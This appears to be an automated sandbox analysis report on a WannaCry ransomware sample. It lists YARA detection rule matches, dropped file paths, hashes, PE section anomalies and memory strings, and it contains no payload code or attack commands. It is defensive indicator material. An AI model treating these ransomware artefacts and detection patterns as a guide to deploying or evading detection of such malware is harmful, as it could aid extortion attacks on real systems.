Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth

PE file contains section with special chars

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Static PE information: section name: ];Au~
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

PE file has a writeable .text section

Source: wBQInv.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00406C40	0_2_00406C40
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00402A76	0_2_00402A76
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00402E7E	0_2_00402E7E
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_0040350F	0_2_0040350F
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00404C19	0_2_00404C19
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_0040541F	0_2_0040541F
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00403797	0_2_00403797
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004043B6	0_2_004043B6
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004031BC	0_2_004031BC
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10006640	0_2_10006640
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10006940	0_2_10006940
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10006280	0_2_10006280
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10005DC0	0_2_10005DC0
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_00416076	2_2_00416076
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_00416D00	2_2_00416D00

Source: Joe Sandbox View

Dropped File: C:\@WanaDecryptor@.exe B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6768 -ip 6768

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskdl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: MyProg.exe.2.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1282248828.0000000002448000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1282296266.0000000002543000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1356687526.0000000000915000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719857363.000000001000E000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekbdlv.dllj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3709965146.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekbdlv.dllj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1295244076.0000000000908000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Binary or memory string: OriginalFilenamediskpart.exej% vs ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.10000000.2.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000000.1256386714.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000002.3703395638.000000000040F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
